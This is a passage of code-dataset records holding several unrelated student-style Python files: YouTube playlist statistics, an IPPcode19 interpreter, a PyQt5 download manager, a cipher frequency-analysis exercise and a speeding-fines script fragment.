cancion[\"album\"]))\n diccionario[\"statistics\"] = self.get_video_statistics(id)\n self.parent.playlists_creadas[self.parent.api][self.play][\"canciones\"].append(diccionario)\n self.add_video_to_playlist(self.youtube, diccionario[\"id\"], self.parent.playlists_creadas[self.parent.api][self.play][\"id\"])\n print(valor, self.parent.playlists_creadas[self.parent.api])\n valor += 1\n self.parent.playlists_creadas[self.parent.api][self.play][\"ready\"] = True\n\n max_coments = 0\n min_coments = float(\"inf\")\n max_likes = 0\n min_likes = float(\"inf\")\n max_dislikes = 0\n min_dislikes = float(\"inf\")\n max_views = 0\n min_views = float(\"inf\")\n for cancion in self.parent.playlists_creadas[self.parent.api][self.play][\"canciones\"]:\n if \"commentCount\" in cancion[\"statistics\"]:\n coments = int(cancion[\"statistics\"][\"commentCount\"])\n elif \"commentCount\" not in cancion[\"statistics\"]:\n coments = None\n if \"likeCount\" in cancion[\"statistics\"]:\n likes = int(cancion[\"statistics\"][\"likeCount\"])\n elif \"likeCount\" not in cancion[\"statistics\"]:\n likes = None\n if \"viewCount\" in cancion[\"statistics\"]:\n views = int(cancion[\"statistics\"][\"viewCount\"])\n elif \"viewCount\" not in cancion[\"statistics\"]:\n views = None\n if \"dislikeCount\" in cancion[\"statistics\"]:\n dislikes = int(cancion[\"statistics\"][\"dislikeCount\"])\n elif \"dislikeCount\" not in cancion[\"statistics\"]:\n dislikes = None\n if coments is not None:\n if coments > max_coments:\n max_coments = coments\n self.parent.playlists_creadas[self.parent.api][self.play][\"max_coments\"] = cancion\n\n if coments < min_coments:\n min_coments = coments\n self.parent.playlists_creadas[self.parent.api][self.play][\"min_coments\"] = cancion\n if likes is not None:\n if likes > max_likes:\n max_likes = likes\n self.parent.playlists_creadas[self.parent.api][self.play][\"max_likes\"] = cancion\n\n if likes < min_likes:\n min_likes = likes\n self.parent.playlists_creadas[self.parent.api][self.play][\"min_likes\"] = cancion\n if views is not None:\n if views > max_views:\n max_views = views\n self.parent.playlists_creadas[self.parent.api][self.play][\"max_views\"] = cancion\n\n if views < min_views:\n min_views = views\n self.parent.playlists_creadas[self.parent.api][self.play][\"min_views\"] = cancion\n if dislikes is not None:\n if dislikes > max_dislikes:\n max_dislikes = dislikes\n self.parent.playlists_creadas[self.parent.api][self.play][\"max_dislikes\"] = cancion\n\n if dislikes < min_dislikes:\n min_dislikes = dislikes\n self.parent.playlists_creadas[self.parent.api][self.play][\"min_dislikes\"] = cancion\n print(self.parent.playlists_creadas[self.parent.api])\n self.parent.block = False\n","sub_path":"back.py","file_name":"back.py","file_ext":"py","file_size_in_byte":10653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522809560","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# posiciones.py\n# \n\nimport csv \n\nfichero = open(\"otro_archivo.txt\", \"w\") #Crea y sobreescribe un archivo.txt\n\nfichero.write(\"1234567890 que cosas pondría\")\n\nfichero.seek(17)\n\nfichero.write(\"XD\")\n\n\n\nfichero.close()\n","sub_path":"jueves/posiciones.py","file_name":"posiciones.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"77031181","text":"#!/usr/bin/env python3\n\nimport sys\nfrom xml.dom import minidom\nfrom symtable import 
SymTable\nfrom instruction import Instruction\nfrom arg import Arg\nfrom labels import Labels\nfrom error import *\nimport argparse\n \ndef print_stats_to_file(file, cnt_insts, cnt_vars):\n \"\"\" Used by STATI extension, writes statistics to an output file \"\"\"\n\n for arg in sys.argv:\n if arg == \"--insts\":\n file.write(str(cnt_insts) + \"\\n\")\n elif arg == \"--vars\":\n file.write(str(cnt_vars) + \"\\n\")\n\n\n### Argument parsing ###\nif (\"--help\" in sys.argv or \"-h\" in sys.argv) and len(sys.argv) > 2:\n err.exit_script(err.missing_parameter)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--source\", dest=\"source_file\", help=\"input xml file, stdin will be used by default if not set\")\nparser.add_argument(\"--input\", dest=\"input_file\", help=\"input for source code interpretation, stdin will be used by default if not set (either --source or --input parameter must be set)\")\nparser.add_argument(\"--stats\", dest=\"stats_file\", help=\"output file for some interpretation statistics\")\nparser.add_argument(\"--insts\", dest=\"stats_insts\", help=\"prints amount of interpreted instructions into file set by --stats parameter\", action=\"store_true\")\nparser.add_argument(\"--vars\", dest=\"stats_vars\", help=\"prints amount of defined variables into file set by --stats parameter\", action=\"store_true\")\nparser.add_argument(\"--debug\", dest=\"debug_mode\", help=\"runs the interpreter in debug mode\", action=\"store_true\")\nargs = parser.parse_args()\n\n# Both source file and input file not set\nif (args.source_file == None and args.input_file == None):\n err.exit_script(err.missing_parameter)\n\n# Read instructions from source file or stdin\nif (args.source_file != None):\n source_file_stream = args.source_file\nelse:\n source_file_stream = sys.stdin\n\n# Check whether source XML is well-formed\ntry:\n xml = minidom.parse(source_file_stream)\nexcept:\n err.exit_script(err.xml)\n\n# Read input from stdin or redirect input file to stdin\nif (args.input_file != None):\n old_stdin = sys.stdin\n try:\n sys.stdin = open(args.input_file)\n except:\n err.exit_script(err.output_file)\n\n# Check for STATI extension parameters\nif (args.stats_insts or args.stats_vars):\n if (args.stats_file != None):\n try:\n stats_file_stream = open(args.stats_file, \"w\")\n except:\n err.exit_script(err.output_file)\n else:\n err.exit_script(err.missing_parameter)\n\n# Custom debug mode\ndebug = False\nif (args.debug_mode):\n debug = True\n\n### Reading XML source file ###\n# Check for language=\"IPPcode19\"\nif \"language\" not in xml.firstChild.attributes:\n err.exit_script(err.lexical_or_syntax)\nif xml.firstChild.attributes[\"language\"].value != \"IPPcode19\":\n err.exit_script(err.lexical_or_syntax)\n\n# Check for excessive text in XML\nfor node in xml.firstChild.childNodes:\n if node.nodeType == node.TEXT_NODE:\n if (not node.nodeValue.isspace()):\n err.exit_script(err.lexical_or_syntax)\n elif node.nodeType == node.ELEMENT_NODE:\n if node.localName != \"instruction\":\n err.exit_script(err.lexical_or_syntax)\n\n# Check for order attribute in instruction elements\ninstructions = xml.getElementsByTagName(\"instruction\")\nfor err.inst_order in range (0, len(instructions)):\n if \"order\" not in instructions[err.inst_order].attributes:\n err.exit_script(err.lexical_or_syntax)\n\n# Sort instruction elements by order number\ninstructions.sort(key=lambda x: int(x.attributes[\"order\"].value))\n\n# Check for valid order sequence\norder_check = 1\nfor inst in instructions:\n if 
order_check != int(inst.attributes[\"order\"].value):\n err.exit_script(err.lexical_or_syntax)\n order_check += 1\n\n### Interpretation ###\n# 1st passing of all instructions to define labels\nlabels = Labels()\nerr.inst_order = 0\nfor inst_order in range (0, len(instructions)):\n err.inst_order += 1\n inst = Instruction(instructions[inst_order])\n if inst.opcode == \"LABEL\":\n labels.add(inst.arg1, inst_order)\n\n# 2nd passing of all instructions to interprete them\ninst_order = 0\ninst_exectuted = 0\nerr.inst_order = 0\nsymtable = SymTable()\n\nwhile inst_order < len(instructions):\n err.inst_order += 1\n inst = Instruction(instructions[inst_order])\n \n if debug == True:\n inst.debug()\n\n if inst.opcode == \"CREATEFRAME\":\n symtable.create_frame()\n elif inst.opcode == \"PUSHFRAME\":\n symtable.push_frame()\n elif inst.opcode == \"POPFRAME\":\n symtable.pop_frame()\n elif inst.opcode == \"RETURN\":\n inst_order = labels.ret()\n elif inst.opcode == \"BREAK\":\n sys.stderr.write(\"Instructions order: \" + str(inst_order + 1) + \"\\n\")\n sys.stderr.write(\"Instructions executed: \" + str(inst_exectuted + 1) + \"\\n\")\n symtable.print()\n elif inst.opcode == \"CLEARS\":\n symtable.clears()\n\n #1 arg: var\n elif inst.opcode == \"DEFVAR\":\n symtable.defvar(inst.arg1)\n elif inst.opcode == \"POPS\":\n symtable.set_var(inst.arg1, symtable.pops())\n\n #1 arg: label\n elif inst.opcode == \"JUMP\":\n inst_order = labels.jump(inst.arg1)\n\n elif inst.opcode == \"CALL\":\n inst_order = labels.call(inst.arg1, inst_order)\n\n #1 arg: symb\n elif inst.opcode == \"PUSHS\":\n symtable.pushs(inst.arg1)\n elif inst.opcode == \"WRITE\":\n symtable.get_value(inst.arg1).write(sys.stdout)\n\n elif inst.opcode == \"EXIT\":\n exit_arg = symtable.get_value(inst.arg1)\n \n if exit_arg.datatype == \"int\":\n if 0 <= exit_arg.value <= 49:\n if args.stats_file != None:\n print_stats_to_file(stats_file_stream, inst_exectuted, symtable.max_defined_vars)\n sys.exit(exit_arg.value)\n else:\n err.exit_script(err.operand_value)\n else:\n err.exit_script(err.operand_type)\n \n elif inst.opcode == \"DPRINT\":\n symtable.get_value(inst.arg1).write(sys.stderr)\n\n #2 arg: var symb\n elif inst.opcode == \"MOVE\":\n move_arg = symtable.get_value(inst.arg2)\n symtable.set_var(inst.arg1, move_arg)\n\n elif inst.opcode == \"INT2CHAR\" or inst.opcode == \"INT2CHARS\":\n if inst.opcode == \"INT2CHAR\":\n operand1_arg = symtable.get_value(inst.arg2)\n else:\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"string\"\n\n if operand1_arg.datatype == \"int\":\n if 0 <= operand1_arg.value <= 1114111:\n result_arg.value = chr(operand1_arg.value)\n else:\n err.exit_script(err.string_operation)\n else:\n err.exit_script(err.operand_type)\n \n if inst.opcode == \"INT2CHAR\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"STRLEN\":\n operand1_arg = symtable.get_value(inst.arg2)\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"string\":\n result_arg.value = len(operand1_arg.value)\n else:\n err.exit_script(err.operand_type)\n symtable.set_var(inst.arg1, result_arg)\n\n elif inst.opcode == \"TYPE\":\n src_var = symtable.get_var_even_uninitialised(inst.arg2)\n dst_var = Arg(None)\n dst_var.datatype = \"string\"\n\n if src_var == None:\n dst_var.value = \"\"\n elif src_var.datatype == \"int\":\n dst_var.value = \"int\"\n elif src_var.datatype == \"bool\":\n dst_var.value = \"bool\"\n elif src_var.datatype == 
\"string\":\n dst_var.value = \"string\"\n elif src_var.datatype == \"nil\":\n dst_var.value = \"nil\"\n elif src_var.datatype == \"float\":\n dst_var.value = \"float\"\n \n symtable.set_var(inst.arg1, dst_var)\n\n #2 arg: var type\n elif inst.opcode == \"READ\":\n input_arg = Arg(None)\n input_arg.read(inst.arg2.value)\n symtable.set_var(inst.arg1, input_arg)\n\n #3 arg: var symb symb\n elif inst.opcode == \"ADD\" or inst.opcode == \"ADDS\":\n if inst.opcode == \"ADD\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n\n result_arg = Arg(None)\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n result_arg.datatype = \"int\"\n result_arg.value = operand1_arg.value + operand2_arg.value\n elif operand1_arg.datatype == \"float\" and operand2_arg.datatype == \"float\":\n result_arg.datatype = \"float\"\n result_arg.value = operand1_arg.value + operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n \n if inst.opcode == \"ADD\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"SUB\" or inst.opcode == \"SUBS\":\n if inst.opcode == \"SUB\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n result_arg.datatype = \"int\"\n result_arg.value = operand1_arg.value - operand2_arg.value\n elif operand1_arg.datatype == \"float\" and operand2_arg.datatype == \"float\":\n result_arg.datatype = \"float\"\n result_arg.value = operand1_arg.value - operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"SUB\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"MUL\" or inst.opcode == \"MULS\":\n if inst.opcode == \"MUL\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n result_arg.datatype = \"int\"\n result_arg.value = operand1_arg.value * operand2_arg.value\n elif operand1_arg.datatype == \"float\" and operand2_arg.datatype == \"float\":\n result_arg.datatype = \"float\"\n result_arg.value = operand1_arg.value * operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"MUL\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"IDIV\" or inst.opcode == \"IDIVS\":\n if inst.opcode == \"IDIV\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n if operand2_arg.value == 0:\n err.exit_script(err.operand_value)\n else:\n result_arg.value = operand1_arg.value // operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"IDIV\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"DIV\" or inst.opcode == \"DIVS\":\n if inst.opcode == \"DIV\":\n operand1_arg = 
symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"float\"\n\n if operand1_arg.datatype == \"float\" and operand2_arg.datatype == \"float\":\n if operand2_arg.value == 0:\n err.exit_script(err.operand_value)\n else:\n result_arg.value = operand1_arg.value / operand2_arg.value\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"DIV\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"LT\" or inst.opcode == \"LTS\":\n if inst.opcode == \"LT\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n result_arg.value = \"false\"\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n if operand1_arg.value < operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == \"false\" and operand2_arg.value == \"true\":\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\":\n if operand1_arg.value < operand2_arg.value:\n result_arg.value = \"true\"\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"LT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"GT\" or inst.opcode == \"GTS\":\n if inst.opcode == \"GT\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n result_arg.value = \"false\"\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n if operand1_arg.value > operand2_arg.value:\n result_arg.value = \"true\"\n\n elif operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == \"true\" and operand2_arg.value == \"false\":\n result_arg.value = \"true\"\n\n elif operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\":\n if operand1_arg.value > operand2_arg.value:\n result_arg.value = \"true\"\n\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"GT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"EQ\" or inst.opcode == \"EQS\":\n if inst.opcode == \"EQ\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n result_arg.value = \"false\"\n\n if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\":\n if operand1_arg.value == operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\":\n if operand1_arg.value == operand2_arg.value:\n result_arg.value = \"true\"\n elif operand1_arg.datatype == \"nil\" and operand2_arg.datatype == \"nil\":\n if operand1_arg.value == operand2_arg.value:\n result_arg.value = \"true\"\n elif 
operand1_arg.datatype == \"nil\" or operand2_arg.datatype == \"nil\":\n ...\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"EQ\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"AND\" or inst.opcode == \"ANDS\":\n if inst.opcode == \"AND\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n\n if operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == \"true\" and operand2_arg.value == \"true\":\n result_arg.value = \"true\"\n else:\n result_arg.value = \"false\"\n else:\n err.exit_script(err.operand_type)\n\n if inst.opcode == \"AND\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"OR\" or inst.opcode == \"ORS\":\n if inst.opcode == \"OR\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n\n if operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\":\n if operand1_arg.value == \"true\" or operand2_arg.value == \"true\":\n result_arg.value = \"true\"\n else:\n result_arg.value = \"false\"\n else:\n err.exit_script(err.operand_type) \n\n if inst.opcode == \"OR\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"NOT\" or inst.opcode == \"NOTS\":\n if inst.opcode == \"NOT\":\n operand1_arg = symtable.get_value(inst.arg2)\n else:\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"bool\"\n\n if operand1_arg.datatype == \"bool\":\n if operand1_arg.value == \"true\":\n result_arg.value = \"false\"\n else:\n result_arg.value = \"true\"\n else:\n err.exit_script(err.operand_type) \n\n if inst.opcode == \"NOT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"STRI2INT\" or inst.opcode == \"STRI2INTS\":\n if inst.opcode == \"STRI2INT\":\n operand1_arg = symtable.get_value(inst.arg2)\n operand2_arg = symtable.get_value(inst.arg3)\n else:\n operand2_arg = symtable.pops()\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"int\":\n if 0 <= operand2_arg.value < len(operand1_arg.value):\n result_arg.value = ord(operand1_arg.value[operand2_arg.value])\n else:\n err.exit_script(err.string_operation)\n else:\n err.exit_script(err.operand_type)\n if inst.opcode == \"STRI2INT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"FLOAT2INT\" or inst.opcode == \"FLOAT2INTS\":\n if inst.opcode == \"FLOAT2INT\":\n operand1_arg = symtable.get_value(inst.arg2)\n else:\n operand1_arg = symtable.pops()\n result_arg = Arg(None)\n result_arg.datatype = \"int\"\n\n if operand1_arg.datatype == \"float\":\n result_arg.value = int(operand1_arg.value)\n else:\n err.exit_script(err.operand_type)\n if inst.opcode == \"FLOAT2INT\":\n symtable.set_var(inst.arg1, result_arg)\n else:\n symtable.pushs(result_arg)\n\n elif inst.opcode == \"INT2FLOAT\" or inst.opcode == \"INT2FLOATS\":\n if inst.opcode == \"INT2FLOAT\":\n operand1_arg = symtable.get_value(inst.arg2)\n else:\n operand1_arg 
= symtable.pops()\n        result_arg = Arg(None)\n        result_arg.datatype = \"float\"\n\n        if operand1_arg.datatype == \"int\":\n            result_arg.value = float(operand1_arg.value)\n        else:\n            err.exit_script(err.operand_type)\n        if inst.opcode == \"INT2FLOAT\":\n            symtable.set_var(inst.arg1, result_arg)\n        else:\n            symtable.pushs(result_arg)\n\n    elif inst.opcode == \"CONCAT\":\n        operand1_arg = symtable.get_value(inst.arg2)\n        operand2_arg = symtable.get_value(inst.arg3)\n\n        if operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\":\n            result_arg = Arg(None)\n            result_arg.datatype = \"string\"\n            result_arg.value = operand1_arg.value + operand2_arg.value\n            symtable.set_var(inst.arg1, result_arg)\n        else:\n            err.exit_script(err.operand_type)\n\n    elif inst.opcode == \"GETCHAR\":\n        operand1_arg = symtable.get_value(inst.arg2)\n        operand2_arg = symtable.get_value(inst.arg3)\n        result_arg = Arg(None)\n        result_arg.datatype = \"string\"\n\n        if operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"int\":\n            if 0 <= operand2_arg.value < len(operand1_arg.value):\n                result_arg.value = operand1_arg.value[operand2_arg.value]\n            else:\n                err.exit_script(err.string_operation)\n        else:\n            err.exit_script(err.operand_type)\n        symtable.set_var(inst.arg1, result_arg)\n\n    elif inst.opcode == \"SETCHAR\":\n        operand1_arg = symtable.get_value(inst.arg2)\n        operand2_arg = symtable.get_value(inst.arg3)\n        result_arg = symtable.get_var(inst.arg1)\n\n        if result_arg.datatype == \"string\" and operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"string\":\n            if 0 <= operand1_arg.value < len(result_arg.value) and len(operand2_arg.value) > 0:\n                result_string = list(result_arg.value)\n                result_string[operand1_arg.value] = operand2_arg.value[0]\n                result_arg.value = \"\".join(result_string)\n            else:\n                err.exit_script(err.string_operation)\n        else:\n            err.exit_script(err.operand_type)\n        symtable.set_var(inst.arg1, result_arg)\n\n    #3 arg: label symb symb\n    elif inst.opcode == \"JUMPIFEQ\" or inst.opcode == \"JUMPIFEQS\":\n        if inst.opcode == \"JUMPIFEQ\":\n            operand1_arg = symtable.get_value(inst.arg2)\n            operand2_arg = symtable.get_value(inst.arg3)\n        else:\n            operand2_arg = symtable.pops()\n            operand1_arg = symtable.pops()\n        if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\" or \\\n        operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\" or \\\n        operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\" or \\\n        operand1_arg.datatype == \"nil\" and operand2_arg.datatype == \"nil\":\n            if operand1_arg.value == operand2_arg.value:\n                inst_order = labels.jump(inst.arg1)\n        else:\n            err.exit_script(err.operand_type)\n\n    elif inst.opcode == \"JUMPIFNEQ\" or inst.opcode == \"JUMPIFNEQS\":\n        if inst.opcode == \"JUMPIFNEQ\":\n            operand1_arg = symtable.get_value(inst.arg2)\n            operand2_arg = symtable.get_value(inst.arg3)\n        else:\n            operand1_arg = symtable.pops()\n            operand2_arg = symtable.pops()\n        if operand1_arg.datatype == \"int\" and operand2_arg.datatype == \"int\" or \\\n        operand1_arg.datatype == \"string\" and operand2_arg.datatype == \"string\" or \\\n        operand1_arg.datatype == \"bool\" and operand2_arg.datatype == \"bool\" or \\\n        operand1_arg.datatype == \"nil\" and operand2_arg.datatype == \"nil\":\n            if operand1_arg.value != operand2_arg.value:\n                inst_order = labels.jump(inst.arg1)\n        else:\n            err.exit_script(err.operand_type)\n\n    inst_order += 1\n    inst_exectuted += 1\n\n    if args.stats_vars:\n        symtable.count_vars()\n\nif args.stats_file != 
None:\n print_stats_to_file(stats_file_stream, inst_exectuted, symtable.max_defined_vars) \n","sub_path":"interpret.py","file_name":"interpret.py","file_ext":"py","file_size_in_byte":24587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"479338539","text":"from PyQt5.QtWidgets import *\nimport sys\nimport urllib.request\nfrom config import memory\nfrom PyQt5.uic import loadUiType\nimport urllib.request\nfrom datetime import date\nimport os\n\n\nfrom config.database import db\n\ncursor = db.cursor()\n\nui, _ = loadUiType('gui_test.ui')\n\nclass MainApp(QMainWindow , ui):\n def __init__(self , parent=None):\n super(MainApp , self).__init__(parent)\n QMainWindow.__init__(self)\n self.setupUi(self)\n self.InitUI()\n \n\n def InitUI(self):\n self.tabWidget.tabBar().setVisible(False)\n self.pushButton.clicked.connect(self.Open_Download)\n self.pushButton_2.clicked.connect(self.Open_Settings)\n self.pushButton_3.clicked.connect(self.Open_History)\n self.path_button.clicked.connect(self.Get_Path)\n self.download.clicked.connect(self.Get_Download)\n \n\n def Open_Download(self):\n self.tabWidget.setCurrentIndex(0)\n\n def Open_Settings(self):\n self.tabWidget.setCurrentIndex(1)\n\n def Open_History(self):\n self.tabWidget.setCurrentIndex(2)\n self.tableWidget.setRowCount(0)\n self.View_Database()\n \n\n def View_Database(self):\n query = \"SELECT * FROM download_manager\"\n cursor.execute(query)\n myresult = cursor.fetchall()\n for row_number, row_data in enumerate(myresult):\n self.tableWidget.insertRow(row_number)\n for column_number, data in enumerate(row_data):\n self.tableWidget.setItem(row_number, column_number, QTableWidgetItem(str(data)))\n\n\n def Get_Path(self): \n self.path = QFileDialog.getExistingDirectory(self, 'Select your folder:')\n print(str(self.path))\n self.path = memory.path(str(self.path))+'\\\\'\n self.pathField.setText(self.path)\n print(self.path)\n\n\n def Get_Download(self):\n sql = \"insert into download_manager(file_name, link, file_size, date_download) values (%s, %s, %s, %s)\"\n self.progressBar.setValue(0)\n arr = str(self.urlText.text()).split('/')\n for i in ['jpg','png', 'pdf','exe']:\n if i in str(self.urlText.text()):\n self.path = self.path + arr[-1]\n urllib.request.urlretrieve(str(self.urlText.text()), self.path)\n value = (arr[-1], str(self.urlText.text()), memory.convert(os.stat(self.path).st_size), date.today().strftime('%Y-%m-%d'))\n cursor.execute(sql, value)\n db.commit()\n break\n prgrs = os.stat(self.path).st_size\n for i in range(prgrs):\n self.progressBar.setValue(i)\n \n\ndef main():\n app = QApplication(sys.argv)\n window = MainApp()\n window.show()\n app.exec_()\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"125325139","text":"import re\nfrom encode import encode\nfrom collections import Counter\nfrom frequency import frequency as frec\n\n\ndef war():\n f = open('warFirstPart.txt')\n text = f.read().lower()\n bigrammsGlobalOrder = Counter()\n for word in re.findall(r'[а-яё]+', text):\n for i in range(len(word) - 1):\n bigrammsGlobalOrder[word[i] + word[i + 1]] += 1\n bigrammsGlobalOrder = list(map(lambda item: item[0], bigrammsGlobalOrder.most_common()))\n\n pos = 0\n while pos < len(text):\n match = re.compile(r'[а-яё]+').match(text , pos)\n if match:\n text = text[:match.start()] + encode(word=match[0]) + 
text[match.end():]\n            pos = match.end()\n        else:\n            pos += 1\n\n    charsCount = Counter()\n    frequency = dict(sorted(list(frec().items()), key=lambda item: item[1], reverse=True))\n    frequencyKeys = list(frequency.keys())\n    for char in text:\n        if char in frequencyKeys:\n            charsCount[char] += 1\n\n    decoder = {}\n\n    charsCount = list(dict(charsCount.most_common()).keys())\n    for char in text:\n        if char in frequencyKeys:\n            decoder[char] = frequencyKeys[charsCount.index(char)]\n\n    bigramms = Counter()\n    open('war_encoded.txt', 'w').write(text)\n\n    for word in re.findall(r'[а-яё]+', text):\n        for i in range(len(word) - 1):\n            bigramms[word[i] + word[i + 1]] += 1\n\n    bigramms = list(map(lambda item: item[0], bigramms.most_common(20)))\n\n\n    bigrammsDecoder = {}\n    for i in range(len(bigramms)):\n        if bigramms[i][0] not in bigrammsDecoder.keys() and bigramms[i][1] not in bigrammsDecoder.keys():\n            bigrammsDecoder[bigramms[i][0]] = bigrammsGlobalOrder[i][0]\n            bigrammsDecoder[bigramms[i][1]] = bigrammsGlobalOrder[i][1]\n\n    decoder = decoder | bigrammsDecoder\n\n    pos = 0\n    decoderKeys = decoder.keys()\n    while pos < len(text):\n        match = re.compile(r'[а-яё]').match(text, pos)\n        if match and match[0] in decoderKeys:\n            text = text[:match.start()] + decoder[match[0]] + text[match.end():]\n            pos = match.end()\n        else:\n            pos += 1\n\n    open('war_decoded.txt', 'w').write(text)\n\n","sub_path":"war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"183661943","text":"from Speeding import *\n\nspeedFinesData = finesFileCheck()\nspeedFines, formattingErrorForFineRates = finesFileFormatCheck(speedFinesData)\n\n#maxSpeed = ((speedFines[-1])[1])\n#maxFine = ((speedFines[-1])[2])\n\nif formattingErrorForFineRates is True:\n    # include an option to simply create a new fine rates file in program\n    continueState = continueOrExitForFines()\n    continueOrExitDueToFormat(continueState)\n\nspeedFileName = speedFileCheck()\ndataDict, speedFormatError = speedFileFormatCheck(speedFileName)\nif 